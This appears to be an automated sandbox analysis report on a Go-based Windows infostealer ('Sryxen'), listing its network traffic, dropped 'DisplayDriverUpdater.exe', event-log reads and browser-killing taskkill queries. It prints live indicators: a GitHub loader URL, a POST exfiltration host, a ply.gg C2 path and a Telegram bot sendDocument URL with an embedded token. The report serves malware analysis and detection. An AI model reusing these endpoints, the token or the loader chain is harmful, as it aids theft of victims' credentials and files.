Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/884985882/bd478a68-b939-4051-a1b9-cad0d16fddc3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241203%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241203T142659Z&X-Amz-Expires=300&X-Amz-Signature=6e528fc71a8cc27f1a71a4e3622cf4755a8b242d62f836013ff1a5f2e9f61272&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DSryxenBuilt.bin&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: github.com
Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: sigma.dreamhosters.com
Source: global trafficDNS traffic detected: DNS query: saw-worse.gl.at.ply.gg
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: sigma.dreamhosters.comUser-Agent: Go-http-client/1.1Content-Length: 946Content-Type: multipart/form-data; boundary=101f6c242fe07287879a3d0bf57ae21a51eb17df40acf0b756a595d07d0eAccept-Encoding: gzip
Source: svchost.exe, 00000018.00000002.3273213169.000002809DA84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.24.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: DisplayDriverUpdater.exe, 0000002A.00000002.3271466483.000001E707471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DisplayDriverUpdater.exe, 0000002A.00000002.3271466483.000001E7074B7000.00000004.00000800.00020000.00000000.sdmp, DisplayDriverUpdater.exe, 0000002A.00000002.3271466483.000001E7074CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: SplpM1fFkV.exe, 00000000.00000002.2723256599.000000C000062000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8081350024:AAFjWgYEaWbdc3lb0pJuWGrUPfHaKqJrDS0/sendDocument
Source: SplpM1fFkV.exe, 00000000.00000002.2723256599.000000C000006000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8081350024:AAFjWgYEaWbdc3lb0pJuWGrUPfHaKqJrDS0/sendDocumentgl.at.ply.gg:
Source: SplpM1fFkV.exe, 00000000.00000002.2723256599.000000C000062000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8081350024:AAFjWgYEaWbdc3lb0pJuWGrUPfHaKqJrDS0/sendDocumentmultipart/for
Source: SplpM1fFkV.exeString found in binary or memory: https://api.telegram.org/botmultipart:
Source: chrome.exe, 00000016.00000003.2336986720.00005440002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000016.00000003.2337046402.00005440002EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
Source: edb.log.24.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000018.00000003.2342228635.000002809D7A0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.dr, edb.log.24.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: SplpM1fFkV.exe, 00000000.00000002.2723256599.000000C0000C0000.00000004.00001000.00020000.00000000.sdmp, SplpM1fFkV.exe, 00000000.00000002.2723256599.000000C0000FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1
Source: DisplayDriverUpdater.exe, 0000002A.00000002.3271466483.000001E707CE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: qmgr.db.24.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: SplpM1fFkV.exe, 00000000.00000002.2723256599.000000C000010000.00000004.00001000.00020000.00000000.sdmp, SplpM1fFkV.exe, 00000000.00000002.2723256599.000000C000018000.00000004.00001000.00020000.00000000.sdmp, SplpM1fFkV.exe, 00000000.00000002.2723256599.000000C000016000.00000004.00001000.00020000.00000000.sdmp, SplpM1fFkV.exe, 00000000.00000002.2723256599.000000C00001C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://saw-worse.gl.at.ply.gg:14254/builder/logAgent
Source: SplpM1fFkV.exe, 00000000.00000002.2723256599.000000C000010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://saw-worse.gl.at.ply.gg:14254/builder/logAgentPost
Source: SplpM1fFkV.exeString found in binary or memory: https://saw-worse.gl.at.ply.gg:14254/builder/logAgenthttp:
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.5:49705 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

barindex
Reads the Security eventlog
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Reads the System eventlog
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

barindex
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeJump to dropped file
Source: C:\Windows\System32\ReAgentc.exeFile created: C:\Windows\Logs\ReAgentJump to behavior
Source: C:\Windows\System32\ReAgentc.exeFile created: C:\Windows\Logs\ReAgent\ReAgent.logJump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeCode function: 42_2_00007FF848F2DC1842_2_00007FF848F2DC18
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeCode function: 42_2_00007FF848F2F65842_2_00007FF848F2F658
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeCode function: 42_2_00007FF848F26DA042_2_00007FF848F26DA0
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeCode function: 42_2_00007FF848F26E2042_2_00007FF848F26E20
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeCode function: 42_2_00007FF848F2EFCD42_2_00007FF848F2EFCD
Source: taskkill.exe, 0000001B.00000002.2350649507.0000018EAE280000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBp
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@89/57@5/6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\3575659c-bb47-448e-a514-22865732bbc
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3556:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:616:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2584:120:WilError_03
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_-399786117
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nuyb0nt3.lwr.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\dc06710391a8ebc020b10003423867723d07269d33a5cdf0fc95d1a2d593e316AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
Source: SplpM1fFkV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;firefox.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;brave.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;opera.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;kometa.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;orbitum.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;centbrowser.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;7star.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;sputnik.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;vivaldi.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;epicprivacybrowser.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;uran.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;yandex.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;iridium.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;firefox.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;brave.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;opera.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;kometa.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;orbitum.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;centbrowser.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;7star.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;sputnik.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;vivaldi.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;epicprivacybrowser.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;uran.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;yandex.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;iridium.exe&quot;)
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;opera.exe&quot;)
Source: C:\Users\user\Desktop\SplpM1fFkV.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: taskkill.exe, 00000023.00000002.2368713271.000001E6FCC19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")es;C:\Windows\system32
Source: taskkill.exe, 00000023.00000003.2368113711.000001E6FCC19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")es;C:\Windows\system32[z
Source: taskkill.exe, 0000001B.00000003.2350293160.0000018EAE2C9000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 0000001B.00000002.2350728834.0000018EAE2C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe")ules;C:\
Source: taskkill.exe, 0000000B.00000002.2309262987.000001AB57C6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "orbitum.exe");C:\Windows\system32
Source: taskkill.exe, 00000019.00000002.2346668677.0000012EC8C79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe");C:\Windows\system32
Source: taskkill.exe, 0000000B.00000003.2308744633.000001AB57C6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "orbitum.exe");C:\Windows\system32M
Source: taskkill.exe, 00000014.00000003.2331079591.0000029C7BFBC000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000014.00000003.2330967064.0000029C7BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "iridium.exe")XT=.COM;.EX
Source: taskkill.exe, 00000019.00000003.2345990198.0000012EC8C79000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000019.00000003.2345885384.0000012EC8C79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe");C:\Windows\system32`V
Source: taskkill.exe, 00000014.00000002.2331924419.0000029C7BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "iridium.exe")XT=.COM;.E
Source: SplpM1fFkV.exeString found in binary or memory: _cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandoned: day-of-year does not match daybufio: invalid use of UnreadBytebufio: invalid use of UnreadRunebufio: tried to fill full buffermime: expected token after slashgo package net: hostLookupOrder(use of closed network connectioned25519: bad public key length: x509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failurecrypto/aes: input not full blockcrypto/des: input not full block" not supported for cpu option "chacha20poly1305: bad key lengthcrypto/ecdh: invalid private keyunexpected character, want coloninput overflows the modulus sizeinteger is not minimally encodedcannot represent time as UTCTimechacha20: invalid buffer overlaptransform: short internal bufferSuccessfully created zip file: %scould not create HTTP request: %vbytes.Buffer.Grow: negative countpseudo header field after regularhttp2: recursive push not allowedhttp: invalid Read on closed Bodynet/http: skip alternate protocolhttp: CloseIdleConnections calledinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qrelease of handle with refcount 0tls: failed to write to key log: tls: invalid server finished hashtls: unexpected ServerKeyExchangetoo many levels of symbolic linksInitializeProcThreadAttributeList142108547152020037174224853515625710542735760100185871124267578125reflect: slice index out of range of method on nil interface valuereflect: Field index out of rangereflect: array index out of range to pointer to array with length sync: RUnlock of unlocked RWMutexslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangego package net: confVal.netCgo = skip everything and stop the walkempty hex number for chunk leng
Source: SplpM1fFkV.exeString found in binary or memory: _cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandoned: day-of-year does not match daybufio: invalid use of UnreadBytebufio: invalid use of UnreadRunebufio: tried to fill full buffermime: expected token after slashgo package net: hostLookupOrder(use of closed network connectioned25519: bad public key length: x509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failurecrypto/aes: input not full blockcrypto/des: input not full block" not supported for cpu option "chacha20poly1305: bad key lengthcrypto/ecdh: invalid private keyunexpected character, want coloninput overflows the modulus sizeinteger is not minimally encodedcannot represent time as UTCTimechacha20: invalid buffer overlaptransform: short internal bufferSuccessfully created zip file: %scould not create HTTP request: %vbytes.Buffer.Grow: negative countpseudo header field after regularhttp2: recursive push not allowedhttp: invalid Read on closed Bodynet/http: skip alternate protocolhttp: CloseIdleConnections calledinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qrelease of handle with refcount 0tls: failed to write to key log: tls: invalid server finished hashtls: unexpected ServerKeyExchangetoo many levels of symbolic 